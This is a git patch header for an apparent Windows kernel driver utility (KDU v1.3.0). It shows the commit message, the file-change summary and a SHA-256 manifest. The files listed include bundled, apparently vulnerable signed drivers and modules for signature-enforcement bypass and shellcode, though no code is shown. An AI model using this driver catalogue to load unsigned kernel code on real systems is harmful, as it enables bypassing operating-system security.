From 07ec6e6fd33bacd1ef7f45c7d51c3e1fe47b90ee Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Wed, 22 Mar 2023 19:20:38 +0700 Subject: [PATCH 1/2] v 1.3.0 Added Hilscher wormhole driver as provider 31 Internal rearrange #56 Readme updated --- KDU.sha256 | 136 ++-- LICENSE.txt | 2 +- README.md | 3 +- Source/Hamakaze/KDU.vcxproj | 2 + Source/Hamakaze/KDU.vcxproj.filters | 6 + Source/Hamakaze/KDU.vcxproj.user | 6 +- Source/Hamakaze/drvmap.cpp | 741 ++++++++++-------- Source/Hamakaze/drvmap.h | 16 +- Source/Hamakaze/dsefix.cpp | 67 +- Source/Hamakaze/idrv/dbk.cpp | 9 +- Source/Hamakaze/idrv/hilscher.cpp | 122 +++ Source/Hamakaze/idrv/hilscher.h | 68 ++ Source/Hamakaze/idrv/procexp.cpp | 17 +- Source/Hamakaze/idrv/winring0.cpp | 6 +- Source/Hamakaze/idrv/zemana.cpp | 81 +- Source/Hamakaze/kduplist.h | 63 +- Source/Hamakaze/kduprov.cpp | 16 +- Source/Hamakaze/kduprov.h | 25 +- Source/Hamakaze/main.cpp | 10 +- Source/Hamakaze/res/SB_SMBUS_SDK.bin | Bin 42973 -> 42973 bytes Source/Hamakaze/res/Taigei32.bin | Bin 2622 -> 2622 bytes Source/Hamakaze/resource.rc | 10 +- Source/Hamakaze/shellcode.cpp | 99 +-- Source/Hamakaze/shellcode.h | 19 +- Source/Hamakaze/sig.h | 11 +- Source/Hamakaze/sup.cpp | 33 +- Source/Hamakaze/sup.h | 13 +- Source/Hamakaze/tests.cpp | 25 +- Source/Hamakaze/victim.cpp | 372 ++++++++- Source/Hamakaze/victim.h | 71 +- Source/Shared/consts.h | 41 +- Source/Shared/kdubase.h | 11 +- Source/Tanikaze/Tanikaze.vcxproj | 3 + Source/Tanikaze/Tanikaze.vcxproj.filters | 9 + Source/Tanikaze/data/KMUEXE.bin | Bin 91965 -> 91965 bytes Source/Tanikaze/data/KMUSIG.bin | Bin 170 -> 170 bytes Source/Tanikaze/data/dbutilcat.bin | Bin 5973 -> 5973 bytes Source/Tanikaze/data/dbutilinf.bin | Bin 961 -> 961 bytes Source/Tanikaze/drv/ALSysIO64.bin | Bin 22889 -> 22889 bytes Source/Tanikaze/drv/ATSZIO64.bin | Bin 10480 -> 10480 bytes Source/Tanikaze/drv/AsIO3.bin | Bin 23237 -> 23237 bytes Source/Tanikaze/drv/AsrDrv106.bin | Bin 28195 -> 28195 bytes Source/Tanikaze/drv/DbUtil2_3.bin | Bin 7938 -> 7938 bytes Source/Tanikaze/drv/DirectIo64.bin | Bin 22129 -> 22129 bytes Source/Tanikaze/drv/DirectIo64_2.bin | Bin 24128 -> 24128 bytes Source/Tanikaze/drv/EneIo64.bin | Bin 9168 -> 9168 bytes Source/Tanikaze/drv/EneTechIo64.bin | Bin 10975 -> 10975 bytes Source/Tanikaze/drv/GLCKIO2.bin | Bin 10566 -> 10566 bytes Source/Tanikaze/drv/HW64.bin | Bin 17993 -> 17993 bytes Source/Tanikaze/drv/MsIo64.bin | Bin 14068 -> 14068 bytes Source/Tanikaze/drv/Phymemx64.bin | Bin 13875 -> 13875 bytes Source/Tanikaze/drv/RTCore64.bin | Bin 7605 -> 7605 bytes Source/Tanikaze/drv/SysDrv3S.bin | Bin 14691 -> 14691 bytes Source/Tanikaze/drv/WinRing0x64.bin | Bin 7989 -> 7989 bytes Source/Tanikaze/drv/amsdk.bin | Bin 93689 -> 93689 bytes Source/Tanikaze/drv/asio2.bin | Bin 19306 -> 19306 bytes Source/Tanikaze/drv/dbk64.bin | Bin 51941 -> 51941 bytes Source/Tanikaze/drv/dbutildrv2.bin | Bin 13068 -> 13068 bytes Source/Tanikaze/drv/ene2.bin | Bin 11550 -> 11550 bytes Source/Tanikaze/drv/gdrv.bin | Bin 12988 -> 12988 bytes Source/Tanikaze/drv/gmerdrv.bin | Bin 28189 -> 28189 bytes Source/Tanikaze/drv/iQVM64.bin | Bin 16988 -> 16988 bytes Source/Tanikaze/drv/inpoutx64.bin | Bin 7526 -> 7526 bytes Source/Tanikaze/drv/kprocesshacker.bin | Bin 19038 -> 19038 bytes Source/Tanikaze/drv/lha.bin | Bin 12338 -> 12338 bytes Source/Tanikaze/drv/mimidrv.bin | Bin 15718 -> 15718 bytes Source/Tanikaze/drv/physmem.bin | Bin 0 -> 13649 bytes .../drv/{procexp.bin => procexp1627.bin} | Bin 18571 -> 18571 bytes Source/Tanikaze/drv/procexp1702.bin | Bin 0 -> 19573 bytes Source/Tanikaze/drv/rtkio64.bin | Bin 25003 -> 25003 bytes Source/Tanikaze/resource.h | 8 +- Source/Tanikaze/resource.rc | 16 +- Source/Tanikaze/tanikaze.h | 116 ++- 73 files changed, 1568 insertions(+), 685 deletions(-) create mode 100644 Source/Hamakaze/idrv/hilscher.cpp create mode 100644 Source/Hamakaze/idrv/hilscher.h create mode 100644 Source/Tanikaze/drv/physmem.bin rename Source/Tanikaze/drv/{procexp.bin => procexp1627.bin} (99%) create mode 100644 Source/Tanikaze/drv/procexp1702.bin diff --git a/KDU.sha256 b/KDU.sha256 index 988312c..a111522 100644 --- a/KDU.sha256 +++ b/KDU.sha256 @@ -26,36 +26,36 @@ f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaz 09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h 09970cfcb9bfb7a8964ae4ec48fd15c1805e93ea81c858de2793691eefda3881 *Source\Hamakaze\diag.cpp a4fa97b9f2be414bc49881450d5935d2b48c1029d3bee655cd6e77e645327d74 *Source\Hamakaze\diag.h -849799b216483d532efa4174e3f2b38d0c812f1ff9b5d98ae41c10c0459f1e04 *Source\Hamakaze\drvmap.cpp -3155737710664a1a2ca28640687a0cbde115f15ce0b48a4833e87173941d4f00 *Source\Hamakaze\drvmap.h -79ce8ae7ab618efc0072b6b8baf90b92f6d1af8e9615089d41854c0d85864bce *Source\Hamakaze\dsefix.cpp +4894e61226774096e0923164898f314e3ff203d34344df35b936b18f3663e3e7 *Source\Hamakaze\drvmap.cpp +c62c75c00882d816856f56005eec67a82cf56179d2a4629c4c8bf53707c16c25 *Source\Hamakaze\drvmap.h +46a4fd4dacc53b917a0894542c786c5db08ac662157438447fa89f71afa615c5 *Source\Hamakaze\dsefix.cpp 5131aa81ffb17238a092b313a954a6d9e9203636ba47562f0a7f8d4daf306221 *Source\Hamakaze\dsefix.h 4c5d5d2f0a0d3e63151c14fafc9a33598ed278b3d2059fa9cd49a08cfbbd3c1f *Source\Hamakaze\global.h ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp 888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h -453492ffb36f26cb4d1fc1ad6c0953be45425f98d5fe8de3f12d768f4d9a947c *Source\Hamakaze\KDU.vcxproj -67808d9ad6f599957d11e5c36ec3845bcdacb6a97337ef96c41af7e5a9d8564e *Source\Hamakaze\KDU.vcxproj.filters -7bbc22af4258dd85e73313ea3186e5beb84151b1be26c2952f7cc260577b3491 *Source\Hamakaze\KDU.vcxproj.user -d0c73c56c8ff26566963332c79992762e8ad83832018267cddab85bd4b1b52ba *Source\Hamakaze\kduplist.h -9282d0885c4961e896423adf431479d752a91ad7fbf036df4a94a3967510b188 *Source\Hamakaze\kduprov.cpp -63f837d245a5fb46f68ff5e522d7e46703e01e6ed7bea261245b72fd0802b044 *Source\Hamakaze\kduprov.h -79e850d593d17f9f6b586050a20f8a1bba5324d92270e2c6f4161b8332c166a4 *Source\Hamakaze\main.cpp +703feb7327733000bdcadbdc41a0c7a09f92f1f12ccec7ea3071c6371f60c23d *Source\Hamakaze\KDU.vcxproj +a62576fdaf4fa1fa3782427c9662c7708af81a81b5703ce8d1a5d3bb4d680bde *Source\Hamakaze\KDU.vcxproj.filters +b3272c6ec95065c5d293cd256f6f395d1d7b6b8dcac6e49cb1d96806d563593e *Source\Hamakaze\KDU.vcxproj.user +a224b5276d3006e16d8bb6b5ef6c701842678612dbcfafb53a840eb174ecfca2 *Source\Hamakaze\kduplist.h +e4008c31f4e819a8920f932f763ecd01a6510715cf6b391354eea281321afe86 *Source\Hamakaze\kduprov.cpp +13a842b3bc62995ab8071ae56df74065d6a1388fcda66884012c6d8addb94055 *Source\Hamakaze\kduprov.h +ace87ca919d2502c47d147814808e42b892b38cf9092aa69a3dad5f44da05323 *Source\Hamakaze\main.cpp e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp 545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h 40067200848300c557bb687db61734f658704afb7ad3be07e4108d80f32c9d48 *Source\Hamakaze\ps.cpp eb15810b52b16482f3a3a679fbeed102257bfa0416243e74fce5b634daf9b074 *Source\Hamakaze\ps.h 6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h -356fa09c4d7e27356dd7076996390ab96a3d338b5a9bdb5e3f6a6559ceae18a5 *Source\Hamakaze\resource.rc -0b63700349f8d478225c5df53b4c18074fc927a46367b73115e40738cbab5480 *Source\Hamakaze\shellcode.cpp -37b72edb872268e4e9f8a12853f4cbf726038cf7f0dc5e0f4239888818f18fed *Source\Hamakaze\shellcode.h +0e45f111f473a67af47b123434e1e1982ef1dc0c6f1bfa250b78402a69fa5df4 *Source\Hamakaze\resource.rc +c617a2090e51738ba9aadff46c573fcf57caada21219ed673ee0f8998e35a831 *Source\Hamakaze\shellcode.cpp +87c7274c6e821eb447ec87b63b0a058c59f0e64f0c109cfc1d529fb8e2f25150 *Source\Hamakaze\shellcode.h 5428b9eb02810dbc4bfd715ec657ee35a5e61e53079c65f05e1eea4f8a6fa4a0 *Source\Hamakaze\shellmasm.asm -e35386b3196b64c28fcd8f09eeb8b74adab7ec05ccf38b4041cee4b04f9eab1f *Source\Hamakaze\sig.h -cf7a0bee79420caa31bc825151ca226b8627e90eb7c6e925dd39882b2456f5a5 *Source\Hamakaze\sup.cpp -988501759bf5c44868569724ea249f22da600675a012aa2f59dccafe97b3e164 *Source\Hamakaze\sup.h -23a3857c01b3decee12138abcb90ec8e7751c7eec3038c546a47b9b76465b770 *Source\Hamakaze\tests.cpp +879eea1c38c0c408e3634d0ed2eeae2b8b21e1040b4b0988ea4d802de0ecd21e *Source\Hamakaze\sig.h +7f97a97deea91390c87c759869e069635be6a329ffc941d53da86cfa0ecf1522 *Source\Hamakaze\sup.cpp +a13d8320351de7e0366dc935271be1e53bd0e69fa02f3141de67cbf71e5f3155 *Source\Hamakaze\sup.h +31ca945f51fd2779e827d0c9cd9dfd58f33d532b0bee00d0aa044910ab71e05c *Source\Hamakaze\tests.cpp ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h -0fd6c0631ae553d443bd01c502b8917379316530bf6de0a5f4204331ddb7664d *Source\Hamakaze\victim.cpp -b4165a29658b4770627aaac15bc36add0a47892d738920de1fc6ec73bb1c3cce *Source\Hamakaze\victim.h +8046da85c2f9853496b369fa63fe1b89d47583d5367db4a49edfd9f52426e6d7 *Source\Hamakaze\victim.cpp +5b82accd00d244d77f107a7b8ff0253548a463e642976c36f76e85649e60fe8e *Source\Hamakaze\victim.h e98c66a33ec03a82fc98ef442b392e3c6221dcb39c1cb695cd983e1b55695d94 *Source\Hamakaze\wdksup.h 31860c95db21761086e2979753e981d6435f27435dead3ed7e4687e99bb878d4 *Source\Hamakaze\hde\hde64.c fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h @@ -67,7 +67,7 @@ fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaz 1c2c5b6a7addf3389a6dee6b11e4a4648d403e9c456008ecefbc79deaa34afae *Source\Hamakaze\idrv\asrdrv.h b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp 015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h -bc249421f95d6a54cf9cb0aae0d717dada4f96a536147014a952d45c99243622 *Source\Hamakaze\idrv\dbk.cpp +515a1a8dfc78af4f8a3a1c832140b033ebc1064386f716729d6e626cde1d590b *Source\Hamakaze\idrv\dbk.cpp 24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h e7a1432ad47fb4d73d9300a6fdc2ae4fa2906821db327c028fdff15c660e4690 *Source\Hamakaze\idrv\dbutil.cpp ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaze\idrv\dbutil.h @@ -75,6 +75,8 @@ ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaz 73a97fa34df9c0733981536f2079d1eab89bfaf36b4c5d0003cb87d504764ec3 *Source\Hamakaze\idrv\directio64.h 65c53a700fff2f766420a7e0612446aed7ef8f04fd44162ff73c0ba7e3581d77 *Source\Hamakaze\idrv\gmer.cpp 89d1cfb34afec23dbda6f40030a95386e9bbbc395666e2c0a3d066dc2fa8b0b8 *Source\Hamakaze\idrv\gmer.h +865bba446ad9f202f2bea58aec4cf48fa87448105dee2fb69caab37ec54f66e8 *Source\Hamakaze\idrv\hilscher.cpp +db94f36f0d3b946500352ab07393994f0a09e2737a63e1cdbedd3da16c72cb2d *Source\Hamakaze\idrv\hilscher.h ae9dd179c7fdc2b1a4741399e64fa9d4a13d22b7fad45cedea9ce285fe7399ea *Source\Hamakaze\idrv\kph.cpp 4bcb0021a14e1d793d9df9f91c4fd261885f4583d36d350661e604fdf407f5d8 *Source\Hamakaze\idrv\kph.h f3c889ede5142f88b54d3e5e973b46f0fb897d306695de82df9c683f72774fb8 *Source\Hamakaze\idrv\ldrsc.h @@ -90,7 +92,7 @@ ce53137a648e55c800e6641b9cb3bf9c148598bbb47972b947f4e4620ae61c9d *Source\Hamakaz 5cb51cbc6d2b2e3174fc2ebbb713e32c34d4d367f299060f400dac331183d236 *Source\Hamakaze\idrv\nal.h f9463d258e2528738ee749a86683079e8b870b8c84d292352952be207b9daff5 *Source\Hamakaze\idrv\phymem.cpp 399a9ced700381d0e3641f2d97a3e9f5dd59cbe22098ac9c0178454f9060d412 *Source\Hamakaze\idrv\phymem.h -28422f3942e14e4205e3a282ae52f93e6bb784516d16561b48e65a35d59c7db5 *Source\Hamakaze\idrv\procexp.cpp +0f30979d4ffbfa0d6b56fda86bfd8974b34d4acf5b4258be263a84b8d02c4ebe *Source\Hamakaze\idrv\procexp.cpp 8449d829c3285f5a22521fba0db1516c487818f901fd28939fc18fbc3da0eedb *Source\Hamakaze\idrv\procexp.h bd0c80bc267d1fa0b423a453a22958a8b1ab1ede29291217cc045a9a877a347f *Source\Hamakaze\idrv\rtcore.cpp 08f75ea88874a507c132bafc412c88f9cc9862f78c238dcbd0cc480a04a438f4 *Source\Hamakaze\idrv\rtcore.h @@ -100,16 +102,16 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz 36ec0baeec7b61dbd9936507fcf1bf5aefec08e96ffe3bcb4883785ea2d9a542 *Source\Hamakaze\idrv\rzpnk.h 48cd4fcd61fb5649064726cb7cc42e9977240c11731cf32a4e971eb39ab51b3d *Source\Hamakaze\idrv\winio.cpp d0e354d2f97e993e5e40fb6bb2b99b5bc753beb23f8213d44f99c0309210c1e8 *Source\Hamakaze\idrv\winio.h -1efd3d1587a63c8afaae9d1b35f37cbb3885332612091cc0f564b5a2c6930444 *Source\Hamakaze\idrv\winring0.cpp +57735ccbb0e84b63a6ffc950b2b392125940cee52012bfe0c762c56144e34e2b *Source\Hamakaze\idrv\winring0.cpp 103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h -9a92bda63624239e5dec54cf94a43ad396efe1ad59465f1359b0aaa94cbe8e11 *Source\Hamakaze\idrv\zemana.cpp +524cb55125d1998b60a259ce689164494810979ade21bf5d23e658feeef845f2 *Source\Hamakaze\idrv\zemana.cpp da1ea3c2ceebfdc6e5c338461dc214798870a0d6aa16f7f23c045123fa450f71 *Source\Hamakaze\idrv\zemana.h de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico -e4c9e433ddad49bf69f67419a999b657848fe030c9f784ad2be2157051800984 *Source\Hamakaze\res\SB_SMBUS_SDK.bin -1895eac97152d51f1742b2a6899f6fd4804d672e3d67017e2c540c2dc8437f09 *Source\Hamakaze\res\Taigei32.bin +37b29350e54c8521ac5d6aab8c29cf21ab3ef91f82724ea275dab5fec0381836 *Source\Hamakaze\res\SB_SMBUS_SDK.bin +2fc5df446424283a11aadd3348fcf1c597f915671ef54767bd50a076998833ad *Source\Hamakaze\res\Taigei32.bin 1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe -a8bbfe3737b1a8bf3757489724a2562840b64e3e29dde11f569887c1910c153c *Source\Shared\consts.h -1b804d8eaf2fc0f55d24b380064e07f84feb49f86b731368a6d6c0a6ba9a7127 *Source\Shared\kdubase.h +ed4006b58c2034270ea2e754b974ab1e255d117ade38dd9e81a78a30243a91d5 *Source\Shared\consts.h +f1122c2a5b1aedef180b0f28b61710cf1260d0a13f89bf60f1aa971106b20fc4 *Source\Shared\kdubase.h e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp 37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\minirtl\cmdline.c @@ -151,48 +153,50 @@ d563bd3017a274175ca6b7e8f93333a3e3ec096d1f3034acfa4e17d8b2420c99 *Source\Taigei\ c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Taigei\Taigei.vcxproj.user 9e82ce97464b666dad14ffde32e5450a0974d1194ca68cd10e9b2611599dfc28 *Source\Tanikaze\export.def 5bbbcc6c275008ffdd765a3fa53ed3e4ae16ea51bf6ae66c2271f6f065ba0525 *Source\Tanikaze\main.cpp -85769e09a6b8f28a1702a2b418fd0410f4d866225198bfb49a8118c6ab7c44cc *Source\Tanikaze\resource.h -ed1f7dbef4a0fe0f487044c8662d52997a3da7907d6ba06707a8fc6251230c72 *Source\Tanikaze\resource.rc -ba591c91af1581f4ef1e59bded47362240e7e9fd42d71e3dc2993aefd4139343 *Source\Tanikaze\tanikaze.h -653ed60972f46872b43a5a485abdd027e112cd9b8f041d3ee7615d304b7feb53 *Source\Tanikaze\Tanikaze.vcxproj -3e9b2bebcfbe721011494bac7582a72f290580a1c7cdbc642596d7c8516e441e *Source\Tanikaze\Tanikaze.vcxproj.filters +8daf6cb5b74792712db6c7ded2328cd297b987870e84754edbdc52d43fc6d88e *Source\Tanikaze\resource.h +9fbf52142a304577ff4155e7c958def354b9ce145faa9f5501f9387822cd1630 *Source\Tanikaze\resource.rc +d0a290dd0dc73de74f21d0a06d5418e3e427af92abb297962bc183554906382e *Source\Tanikaze\tanikaze.h +ff036adba02e6fc3b28b9d19a2db5b4004a2973bead146470132a4782e58cdeb *Source\Tanikaze\Tanikaze.vcxproj +c17934d2254a6965a6a8f08ed5572e8ca8f2a5e319c126bd02435e2a5e7aebfe *Source\Tanikaze\Tanikaze.vcxproj.filters c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user e5b34092e5966007527d8947c0ca7fd2743d15ef33dcbfa6350ccf4f25a39e2c *Source\Tanikaze\data\AsusCertService.bin -2fc87991b1e2cd078b36d207c198d4a7597967f9567496a60d621307d2ffa10a *Source\Tanikaze\data\dbutilcat.bin -8b2e5ac07302d967fdc7cedbc3a92634db254f4e5e4a0f0f951fdd52f4706ed0 *Source\Tanikaze\data\dbutilinf.bin -ef558697fedc6ac7bc4a4ef4c6b7843a28b2ea170a5cb2f1ff2dfea767be8c29 *Source\Tanikaze\data\KMUEXE.bin -cdc55b53f18a2e7108783ad35dd02ec8180da709cbb9944f33da84f0125a0c22 *Source\Tanikaze\data\KMUSIG.bin -177810f5deefebc84736a5deef85abc8626d9536e31c11cbd749a6ba4f1dee0f *Source\Tanikaze\drv\ALSysIO64.bin +bf28fc1cf75228c4444d64505f45d064c963360ecfac030eeed61d07c71adb15 *Source\Tanikaze\data\dbutilcat.bin +4c1ba3e30bbe1948f54ee9dd531cb92e968d9a3c2bbd1ed22bdef17f0e7b3530 *Source\Tanikaze\data\dbutilinf.bin +5ad7c9ad80c6cf4511045502e7f3d8da401330baee1b998f39b3f1c73035e3fc *Source\Tanikaze\data\KMUEXE.bin +f8d9c5e43d7773acf0377ebbf37f579627bf071535e9c0a38b7fda1649c750ef *Source\Tanikaze\data\KMUSIG.bin +475a31cc31b610fc3c0c5fafb702db57317eac7114b298e80c472759cf872bda *Source\Tanikaze\drv\ALSysIO64.bin 9037d39509d73a7cf38ed40ece7f07dc4511e8eb47f4dcd6be53b9d251eb5a20 *Source\Tanikaze\drv\AMDRyzenMasterDriver.bin -86fa99019b48f86279c132d73cb0d4ace153f946b2894f5da1bed0374b30e785 *Source\Tanikaze\drv\amsdk.bin -f7f22651f4e812d3a4a01b4d10fc11fe67c5e0225a3e246a301457b4f5129cad *Source\Tanikaze\drv\asio2.bin -5c333394897e6e4674c3f9711685b0ac39d97b485433440840d16b9e0da961d3 *Source\Tanikaze\drv\AsIO3.bin -c54e4ed8fc8ee65be5bf90d2bc07771281fe1a0c60e48d0353d40cb2448acf1a *Source\Tanikaze\drv\AsrDrv106.bin -9e01a403023b369852cc17b51ddc984e78d30a409c55bd27ec54c99788582f1e *Source\Tanikaze\drv\ATSZIO64.bin -0bd05c6088d906efdd84877f693d698393157393bda36d526170a8192c4c72ee *Source\Tanikaze\drv\dbk64.bin -474246e4295be8ba6cbebebf094d43cc7fe3fabadf68cfea97b581556b92487f *Source\Tanikaze\drv\DbUtil2_3.bin -5e854a3f2854bcaf9619655849ab37091202bdcdf7cf4cb2c83f72294b11b12a *Source\Tanikaze\drv\dbutildrv2.bin -0617a3539b05223c88de2904fe1830d22d84498c0e517a58fb83c49c9658971b *Source\Tanikaze\drv\DirectIo64.bin -c4ba2ccf8f9f6517f286c3a72802dff0519b59b02ac0ae7899c081ad75e90a9a *Source\Tanikaze\drv\DirectIo64_2.bin -20b21c980e134585d21cd0eb17ec303cb96149e2310008e547b4acb6e070d42c *Source\Tanikaze\drv\ene2.bin -7eab2260c44d299a532679cdc59ad73199c6ca312473e4e0af59811dabac5866 *Source\Tanikaze\drv\EneIo64.bin -9eb9e88e8182e82bfc2eeaf53a383dfae6a22c9df0e9d4db0bf3bf8d2ce45df2 *Source\Tanikaze\drv\EneTechIo64.bin -20aa1739fb0ad2d8f426064b93a0931f898fbdee2587ec3df8228f6aa24c4e6f *Source\Tanikaze\drv\gdrv.bin -3bb4b9bed6ec54a88e86530fb8d95df8f7cbe64d17b325663f815deba425c600 *Source\Tanikaze\drv\GLCKIO2.bin -308bf61fabaa9d29c79dc92b72527810b773c608ca1afa5c98cd61d916acd726 *Source\Tanikaze\drv\gmerdrv.bin -dc4d77a8bcc3e3fdfe5c9bc15b67261d5f301d588d28e69d05767076f60f3964 *Source\Tanikaze\drv\HW64.bin -6a1e71d32a56a497706541d8e2b1283ae65413be6cb9580837274259bb638124 *Source\Tanikaze\drv\inpoutx64.bin -cabed16eceebb7399d565eebf50023f1d10c7e7a99a096c7f6240e2a96c2b0a7 *Source\Tanikaze\drv\iQVM64.bin -cb7c160ebfd3013859c811c42dfbd6ba1e327d299ce304766edbc2c403259a22 *Source\Tanikaze\drv\kprocesshacker.bin -0d792ba47a116c951d9d6fccb13007229db8c2e0ed1a8774189c4b2ef2c9a6d8 *Source\Tanikaze\drv\lha.bin -36ea25d89914797b480159428b17cb3dbb6671a568c23c4797053c3da193b082 *Source\Tanikaze\drv\mimidrv.bin -34ed60208e2e4e1ab06439871d3ff07231a882a7fb5392a3a5177f543d66f2f0 *Source\Tanikaze\drv\MsIo64.bin -7e8d7e6c50ae7c514af0510684f035f2b14ab13a5ef78130ecb7218eb5b21857 *Source\Tanikaze\drv\Phymemx64.bin -909f12a24d007b9886f37d789ab04f8a306cb96a9ab450912c107c5bd50e2200 *Source\Tanikaze\drv\procexp.bin -7d0bdea24cac97d348a002c55c051bab86eb3c4ed7d45ec33ad1e78ab433a1fe *Source\Tanikaze\drv\RTCore64.bin -fc69bce06f920e67783af2051a9cc950231e1bc4cac17f2d79bd2818853a3131 *Source\Tanikaze\drv\rtkio64.bin -20d33bf70f69cb34ed5f5c46ba83521e57a10215956f26cdab4e42a3d6831113 *Source\Tanikaze\drv\SysDrv3S.bin -504a606086c4480b33870ffa29d0f9d7ecb313560ca83c7c52c7a3f71bda113c *Source\Tanikaze\drv\WinRing0x64.bin +be1350c61d6cffca82513ee2fc171bae05d21504079498a99b36a42e3d9f5c0b *Source\Tanikaze\drv\amsdk.bin +a4dfa521372c860c2fec697fb812b11c235059ebe0d7d67b177d18c94fb9d5f5 *Source\Tanikaze\drv\asio2.bin +d3f56d7e3152bcc6aa32ab7362cab2b2558455ca46aed303358c0563d5131958 *Source\Tanikaze\drv\AsIO3.bin +f35ca639b8401dffd10aae08c2a79d0dfcb2709d4088ad222381e92a2decd048 *Source\Tanikaze\drv\AsrDrv106.bin +207cd5287d1de9d2a67c0a8bfe1d60a6352044a74dbf60cfa67c6ab75c727259 *Source\Tanikaze\drv\ATSZIO64.bin +5e46458eff1cbba96b51d96edf2e83e56a412c91529d19c5ac7e4fda48068252 *Source\Tanikaze\drv\dbk64.bin +bbc4aef5747452a8f1f25e56ed4dd0d4e0e974de2fbe30f46c6c2e1f75569e3e *Source\Tanikaze\drv\DbUtil2_3.bin +6f654ce6fc41913707076409fd1847595ecb5a3c17fffb93ff9cce54261310ec *Source\Tanikaze\drv\dbutildrv2.bin +7bd7a152edbf57d34543e296455fda492e6ebbe7576cdad3b4b83ee68df34e4e *Source\Tanikaze\drv\DirectIo64.bin +4374308cca737db252ce897db1e3902acf105b59127c2a636789461d4992303d *Source\Tanikaze\drv\DirectIo64_2.bin +82ae0b60cfb1db183e11b2dd780616667f599e8cddcb10b0682b0d5fc3d0d934 *Source\Tanikaze\drv\ene2.bin +fd0e0357a6ec0f478f28f9e7edcdab4de3c1afdd60ddc2595b404c778eec0f77 *Source\Tanikaze\drv\EneIo64.bin +dd2ddd096b6fe4478d8faadc4646b85e02bd9ccd8d8611764a04bcca69ab0f38 *Source\Tanikaze\drv\EneTechIo64.bin +d01ab171487a56241bbc424b7e62766e1e2ffe474b588c3dfce08ae533bf1a50 *Source\Tanikaze\drv\gdrv.bin +a34ccc9d93d53fb7e43cdf7448211d67ddf3ec7fc8ee50994d45ce42fa5be9fe *Source\Tanikaze\drv\GLCKIO2.bin +df434c67e2e11b5e507d1fd96724c8e25a2fd1ee953ec229546ec07199d39a98 *Source\Tanikaze\drv\gmerdrv.bin +04996fd18302bc54f2727c1443e52cc15bdf8ecfbdda3368d0af84dc9b7c7c6d *Source\Tanikaze\drv\HW64.bin +19f5b948413d487fe1268dc44192e18c38b1c912077d5c22a6bc9e75859837f2 *Source\Tanikaze\drv\inpoutx64.bin +1e4ad240ffc5dca1ba78b17128506192e81793d21e114bdde940f9d7323023fd *Source\Tanikaze\drv\iQVM64.bin +3d525411632c8bc5d8fb6dd002d5cf16e2db21568642933a88a51e1e8633b506 *Source\Tanikaze\drv\kprocesshacker.bin +bddab9fc551c94a4254c4bb532223254f9f922c3586350ae6ba5d5ce46f4c338 *Source\Tanikaze\drv\lha.bin +328a955462eb3cb7afe5961a44703084e0a185a734faaff84e5b74e13a994732 *Source\Tanikaze\drv\mimidrv.bin +ab27dcd20a3a8a7b9c59767c2cddc176076f3bed4d639a93ac7bfd60f3d0e540 *Source\Tanikaze\drv\MsIo64.bin +66e6f0931f5796381704e9352b6f5c9b4b779bf224ab0f24ca2c7cd2204b661f *Source\Tanikaze\drv\Phymemx64.bin +e4537e65c80490987d400c6b4929ffc830c187c399ed72eb31a4f290c5dbec44 *Source\Tanikaze\drv\physmem.bin +8db0eaf0acadcf6f38d1b0d6f2d6b8542ec5ebaca730f177e644aac96a37526c *Source\Tanikaze\drv\procexp1627.bin +44ef6ddbb1a0ce9eef4cc573ee1e470836533600a4e443702468e052ba9d5ce5 *Source\Tanikaze\drv\procexp1702.bin +e2d4af8b8585d062f7c0ea90c94f94c1fcaefa8654f676b7becda0e554ca8779 *Source\Tanikaze\drv\RTCore64.bin +69f688c2479a955ee8e8e00475e2d2ba3c75d774e33f3443b0bbe27b1ab7e3e6 *Source\Tanikaze\drv\rtkio64.bin +9ef4ffcedee2f85c105b5a4e4fd394ddf5f91b1d50b35904f6ce496bed62ea88 *Source\Tanikaze\drv\SysDrv3S.bin +9075e85a4e4bc2c0ac3e40ec9c79e72eb1944a078dd0dc6a1fbb0ca0772489b4 *Source\Tanikaze\drv\WinRing0x64.bin 